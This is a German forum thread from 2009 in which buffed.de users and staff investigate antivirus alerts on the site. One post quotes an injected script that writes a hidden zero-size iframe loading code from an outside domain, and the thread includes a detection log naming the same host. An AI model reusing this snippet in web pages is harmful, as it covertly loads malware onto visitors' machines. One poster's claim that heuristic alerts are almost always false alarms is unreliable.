Trojaner per wow.buffed.de

1. Bin ich Selbst Programmierer für Webanwendungen (also einer der mit dem Code arbeitet und kein dieser MöchtegernCMS-User) und kenn mich bestens aus was möglich ist und wann Grund zur Sorge besteht.

Die Erklärung bzgl. Code-Einbindung und Auskommentieren war/ist unter anderem ein allgemeiner Hinweis für alle weiteren Leser des Themas. Das irgendwer bei irgendeinem Post über irgendwelche Kenntnisse verfügt, ist den Beiträgen ohne entsprechende Hinweise nicht immer zu entnehmen.

2. Wir setzen die kostenpflichtige Variante ein die auch Täglich aktualisiert wird. Gestern gab es noch keine "Warnung" Habe ich also rückwärts geupdatet?

Bei entsprechenden IT-Kenntnissen sollte Dir klar sein, dass aktuelle Signaturupdates auch Fehler enthalten können.

3. Habe ich vollstes Verständnis für Fehler z.B. Programmleichen die plötzlich zum Problem werden. Wofür ich absolut kein Verständnis habe ist wenn Besucher egal ob Laien oder Profis dumm gemacht werden a-lá: Virensoftware aktualisieren oder darauf wart ob die Warnung morgen immer noch da ist.

Das war nicht im Ansatz als "Dumme Anmache" gemeint, nur aufklärend. :-) Selbst sie kommerziellen Versionen der Virenscanner sind nicht vor Fehlern geschützt.

Die Empfehlung zu Wartet ob eine Sicherheitswarnung in 1 oder 24 Stunden immer noch eine Sicherheitswarnung ist bissel .....

... realistisch. Ja.

Dann kann ich auch gleich auf Sicherheit verzichten.

Ich sehe keinen Hinweis meinerseits, den Virenscanner abzuschalten.
 
Zuletzt bearbeitet von einem Moderator:
...
Der Hinweis auf "awst.js" lies nur den Schluss zu, dass es sich um eine Datei des schon seit über einem Jahr deaktivierten Trackingsystems "AW-Stats" handelt. Jedoch gibt es die vom Virenscanner angesprochene Datei weder im Quellcode, noch auf unseren Webservern und sie ist auch nicht über dritte Scripte eingebunden.

Ich denke auch nicht das es was schlimmes ist, nur was hat es dort zu suchen?

News:
buffed intern: Cryengine in Aion im Grafikvergleich
PC Games Hardware fühlt dem MMO auf den Technik-Zahn

Hier in der News ist im Html Code der Verweis auf die awst.js eingebaut.

Code:
... ergleich</span><br>PC Games Hardware fühlt dem MMO auf den Technik-Zahn<script src="/fileadmin/js/awst.js"></script></a></div>...

Die awst.js wo sie doch nicht auf dem Server ist, lässt sich aber ohne Probleme downloaden.

Inhalt der awst.js:
Code:
document.write("<iframe src=http://www.gostatsane.com/reg.asp width=0 height=0></iframe>");

Diese reg.asp erzeugt dann wieder eine Flaschdatei. Da kann ich jetzt nicht mehr reinschauen was die macht, ist auch nur weiss bei mir.


Mal schauen ob es demnächst ein Update gibt bei Avira das diese Malware nicht mehr anzeigt.
 
Die Erklärung bzgl. Code-Einbindung und Auskommentieren war/ist unter anderem ein allgemeiner Hinweis für alle weiteren Leser des Themas. Das irgendwer bei irgendeinem Post über irgendwelche Kenntnisse verfügt, ist den Beiträgen ohne entsprechende Hinweise nicht immer zu entnehmen.



Bei entsprechenden IT-Kenntnissen sollte Dir klar sein, dass aktuelle Signaturupdates auch Fehler enthalten können.

Das ist möglich daher ist der Titel des Post auch eine Frage gekennzeichnet durch .......... ein Fragezeichen.
Signaturupdates hin oder her die sind völlig irrelevant
Da ist ne Sicherheitssoftware die Alarm schlägt,
für den Enduser am client is es völlig rille wer hier den Fehler macht
Seine einzige Aufgabe ist solche Meldungen ernst zu nehmen

Das war nicht im Ansatz als "Dumme Anmache" gemeint, nur aufklärend. :-) Selbst sie kommerziellen Versionen der Virenscanner sind nicht vor Fehlern geschützt.



... realistisch. Ja.

Die Aufforderung zu warten und eine Warnung einer Sicherheitssoftware eine gewisser Zeitspanne zu ignorieren, ist schon ganz schön Dumm.
Jeder der weiß wozu ein Virenscanner da ist, kommt sich bei dieser Aufforderung verarscht vor. (was ich mit "Dumme Anmache" gemeint habe)
Im Falle eines ernsten Problems ist das der Tot von wie vielen Spiel Accounts?



Ich sehe keinen Hinweis meinerseits, den Virenscanner abzuschalten.

Wie viel Sinn macht eine Sicherheitssoftware deren Warnungen man aus sitzt?

--------------------------

Mein Vorposter hat sich dem ja schon genau angenommen danke dafür nochmal.

--------------------------

Das Ihr mittlerweile nicht mal mehr WoW Goldwerbung aus Euren Content halten könnt mach die Möglichkeit von Malware auch nicht unwahrscheinlicher.
 
Zuletzt bearbeitet von einem Moderator:
Die awst.js wo sie doch nicht auf dem Server ist, lässt sich aber ohne Probleme downloaden.

Vielen Dank für den Detail-Hinweis.
smile.gif
Ich kann sie nur zu keinem Zeitpunkt aufrufen. Und selbst wenn sie appended wäre, könnte man sie nicht über den /fileadmin/-Pfad erreichen, weil es sie nicht gibt. o.O

Frage zur besseren Analyse: Filterst du die Werbung auf buffed.de?
 
Zuletzt bearbeitet von einem Moderator:
Die Aufforderung zu warten und eine Warnung einer Sicherheitssoftware eine gewisser Zeitspanne zu ignorieren, ist schon ganz schön Dumm.

Vielen Dank das es jetzt nach irgendwelche Eigeninterpretationen mit der Ausdrucksweise auf die persönliche Ebene geht.
smile.gif


Das Ihr mittlerweile nicht mal mehr WoW Goldwerbung aus Euren Content halten könnt mach die Möglichkeit von Malware auch nicht unwahrscheinlicher.

Bitte was?
 
Nun lasst mal die Kirche im Dorf ...

Ich kann durchaus beide Seiten verstehen. Der Webseitenbetreiberkann ja schlecht seine gesamte Community-Software nach Inhalten mit jeder Virendefinition eines jeden Antivirenprogramms checken. Und da die Updates für die Virenerekennung beinahe stündlich kommen, ist das ein Ding der Unmöglichkeit. Der Webseitenbetreiber ist letztlich nicht dafür vetantwortlich, wenn in einer Virendefinitionsdatei ein Virus/Malware aufgeführt ist, der zufällig oder mit Absicht die gleiche Zeichenabfolge hat, wie ein auf der Webseite verwendetes Script.

Als einigermassen versierter Anwender muss ich aber auch wissen, was ich tun muss, wenn ich eine Virenmeldung erhalte. Das ist je nach Antivirussoftware unterschiedlich. Letztlich kann man vier mögliche Reaktionen unterscheiden:

- Virus etc. in die Qurantäne verschieben
- Virus etc. löschen
- Virus zur Überprüfung an den Hersteller der Antivirussoftware senden
- Zugriff auf die Seite mit dem Virus etc. unterbinden

Letztlich muss ich als Anwender hier eine Aktion starten und kann meine Verantwortung dafür nicht an den Webseitenbetreiber abschieben.

Insgesamt fand ich daher die Reaktion von ZAM angemessen.
 
Vielen Dank das es jetzt nach irgendwelche Eigeninterpretationen mit der Ausdrucksweise auf die persönliche Ebene geht.
smile.gif

Ach bin ich nicht der einzigste der nich genau liest?
Ich bewertete eine Vorgehensweise bzw. eine Empfehlung mit dem Wort "Dumm"
Keine Person oder gar einen Empfehlenden.



Im Aion Livestream befindet sich Werbung für Goldseller.
siehe Screen:
 
Frage zur besseren Analyse: Filterst du die Werbung auf buffed.de?

Adblock Plus ist bei mir aktiv im FF.

Nach dem Update von Avira ist keine Meldung mehr da. Finde auch das Script nicht mehr im Quelltext.
Die Datei lässt sich nun auch nicht mehr Downloaden.

Wo der Hinweis mit dem Werbefilter kam, machte es ein wenig klick.
Der Filter bearbeitet auch den einkommenten Quellcode, was dann am Ende nicht mal euer Fehler ist sondern ein Fehler von Add Blocker.

Bei mir ist die Meldung erstmal weg. Kann euer Seite wieder normal aufrufen.
 
Die Meldung sollte jetzt nicht mehr auftauchen - diese merkwürdige Einbindung ist, dank Eurer Hinweise, getilgt.
Die Seite die darin aufgerufen wurde, beinhaltete aber... nichts - es wurde auch nichts im Hintergrund ausgeführt. Echt merkwürdig.

Hab das ganze gerade eben gehabt:
02.10.2009 07:20:11 Gefunden: Trojan-Downloader.JS.Small.oj Firefox http://www.gostatsane.com/nYnTd14.htm

Kaspersky internet security 2010

Bin vom offiziellen Wowforum auf die Buffed Frontseite und da war er.
 
Hallo,
ich muss leider auch anmerken das irgendwas mit der Page nicht stimmt.
Seid heute früh bekomme ich auch immer wieder "HEUR/HTML.Malware" Warnungen vom Scanner, die Version vom VirenScanner ist natürlich aktuell und bis auf Buffed.de meldet er keine Seiten.
Auch wenn ich nachvollziehen kann das ihr nichts dafür könnt wenn ein Scanner eure Seite irrtümlich als "verseucht" bezeichnet würde ich dennoch überlegen ob vielleicht das aufräumen des Codes oder das Prüfen der eingehängten Werbung sinnvoll ist. Sonst könnte man doch wirklich auf die Idee kommen das euch eine eventuelle Verseuchung der PC's eurer User egal ist.

SW-Versionen:
Avira Personal
- Produktversion: 9.0.0.410
- Suchengine: 8.02.01.27
Opera Browser
- Version: 10.00
- Build: 1750
- ID: Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00
Betriebssystem
- OS: Vista Home Prof. SP1
- Benutzerkontensteuerung: aktiv
 
Kann ich bestätigen. Und wiedermal direkt am Anfang eines Monats. Zufall?
 
also mein antivir erkennt da nix Oo und norton auch nicht also kasperski is schon komisch

(bitte jetzt kein streit welches antivirenprogramm das sicherste ist)
 
02.10.2009 07:20:11 Gefunden: Trojan-Downloader.JS.Small.oj Firefox http://www.gostatsane.com/nYnTd14.htm

"JS.Small" ist eine Bezeichunung für einen Downloader, der Lücken in eurem System ausnutzt. Wie du siehst, ist die Seite nicht von Buffed, sondern eine Seite von ner Werbung oder so.. Wenn du dein FireFox oder was auch immer, und dein Windows brav updatest, kann das Ding ganz genau .. nichts (!) machen. Wenn du das nicht tust, dann selber schuld.

Hallo,
ich muss leider auch anmerken das irgendwas mit der Page nicht stimmt.
Seid heute früh bekomme ich auch immer wieder "HEUR/HTML.Malware" Warnungen vom Scanner, die Version vom VirenScanner ist natürlich aktuell und bis auf Buffed.de meldet er keine Seiten.
Auch wenn ich nachvollziehen kann das ihr nichts dafür könnt wenn ein Scanner eure Seite irrtümlich als "verseucht" bezeichnet würde ich dennoch überlegen ob vielleicht das aufräumen des Codes oder das Prüfen der eingehängten Werbung sinnvoll ist. Sonst könnte man doch wirklich auf die Idee kommen das euch eine eventuelle Verseuchung der PC's eurer User egal ist.

Kannst du lesen? "HEUR/HTML.Malware" ~ "Heuristical Report/HTML Malware" = "Heuristische Meldung" ! Wenn zb. ein Stück der Werbung ein Popup aufmacht, in dem ein String, oder eine Variable als "variable57" definiert ist, und im Virus "PöseMalware" dieselbe Variable vorkommt, aber ansonsten nichts verdächtig ist, dann heißt das "HEUR/HTML.Malware". Also ein heuristischer Report, also zu 99,99999% ein Fehlalarm. (Btw, die Heuristik von Avira is eh scheiße, eben wegen diesem von mir genannten Beispiel, weswegen die von mir auch abgewürgt wurde.)

Das liegt also NICHT am unaufgeräumten Code. Prüfen der eingehängten Werbung geht nicht, da diese von einer externen Firma bereitgestellt wird. (Nehme ich mal stark an.)

Von daher beruhigt euch Kinder, und informiert euch ein bisschen.
Ich glaube ich sollte mal sowas wie einen Aufklärungsthread machen. Nicht den mit Bienchen und Blümchen, sondern mit Systemsicherheit
biggrin.gif


EDIT: Schamos, habe GENAU die selbe Version von Avira, nur mit FireFox + AdBlockPlus. Also liegt es nicht an buffed, sondern an dir. Bei mir kommt nämlich nichts.

EDIT2: ZAM, es liegt an der Seite gostatsane. c o m, ist nicht aufrufbar (Directory Listing Denied This Virtual Directory does not allow contents to be listed.), versucht einen uralten IFrame, der per Javascript Schadcode auf dem Rechner ausführen kann. Glaube vor ca. nem Jahr kam ein Hotfix für Windows raus - also wer sich da infiziert, hat es VÖLLIG sich zuzuschreiben, da ihr ja nicht für die Werbung verantwortlich seid.
 
Zuletzt bearbeitet von einem Moderator:
EDIT2: ZAM, es liegt an der Seite gostatsane. c o m, ist nicht aufrufbar (Directory Listing Denied This Virtual Directory does not allow contents to be listed.), versucht einen uralten IFrame, der per Javascript Schadcode auf dem Rechner ausführen kann. Glaube vor ca. nem Jahr kam ein Hotfix für Windows raus - also wer sich da infiziert, hat es VÖLLIG sich zuzuschreiben, da ihr ja nicht für die Werbung verantwortlich seid.

Jaein - wir haben zwar keinen Einfluss auf die Werbeschaltung direkt, aber sollte irgendwas negatives dahinter stecken, ist es auch unser Problem - Wir analysieren die Meldungen und senden alle möglichen Infos an unseren Anbieter weiter. Wenn der Code durch einen der Banner in der Rotation in die Seite eingebunden werden sollte, muss der Banner auf jeden Fall raus, egal was drauf gezeigt wird. Aber unsere Scanner haben bisher nichts gemeldet und auch die in den Virus-Infos geführten Dateien, die angeblich durch den erwähnten Schadcode heruntergeladen werden sollen, sind nicht zu finden. Aber wie gesagt, zur Sicherheit sind alle bisherigen Infos an den Anbieter unserer Werbeschaltungen weitergegeben.

Wie schon geschrieben, die angeblich damit zusammenhängenden Dateien auf unserem Server sind nicht auszumachen und die Scripte, die auf den gemeldeten Seiten eingebunden sind, sind secure. Ich sehe keine Gefährdung.
 
Zuletzt bearbeitet von einem Moderator:
Jaein - wir haben zwar keinen Einfluss auf die Werbeschaltung direkt, aber sollte irgendwas negatives dahinter stecken, ist es auch unser Problem

Ja, war auch gemeint, bisschen doof von mir ausgedrückt
blush.gif


Wie schon geschrieben, die angeblich damit zusammenhängenden Dateien auf unserem Server sind nicht auszumachen und die Scripte, die auf den gemeldeten Seiten eingebunden sind, sind secure. Ich sehe keine Gefährdung.

Trotzdem würde ich versuchen nichts mit der Seite gostatsane . c o m zu tun zu haben.
 
Trotzdem würde ich versuchen nichts mit der Seite gostatsane . c o m zu tun zu haben.

Ich glaube, sollte tatsächlich was in der Richtung ausgeliefert werden, dass keinerlei Absicht bzw. bewusstes Einbinden durch den Anbieter dahinter steckt. Wie gesagt, die Prüfung läuft bereits - ich habe den Verdacht auf Signaturf*ck*ps der Virenscanner. Ist ja nichts neues, dass Scripte mit "ähnlichen" Codebereichen wie der "Virus" als schon bekannter Schadcode fälschlich identifiziert werden. Aber selbst dann, würde ich gern wissen, was das auslöst.
 
Zuletzt bearbeitet von einem Moderator:
"JS.Small" ist eine Bezeichunung für einen Downloader, der Lücken in eurem System ausnutzt. Wie du siehst, ist die Seite nicht von Buffed, sondern eine Seite von ner Werbung oder so.. Wenn du dein FireFox oder was auch immer, und dein Windows brav updatest, kann das Ding ganz genau .. nichts (!) machen. Wenn du das nicht tust, dann selber schuld.

Hab ich was anderes behauptet? Nein es war nur eine simple Meldung. Wieso postest du sowas, ist deine Berufung durch Foren ziehen und Leute anzumachen?
Schulferien!
 
Zurück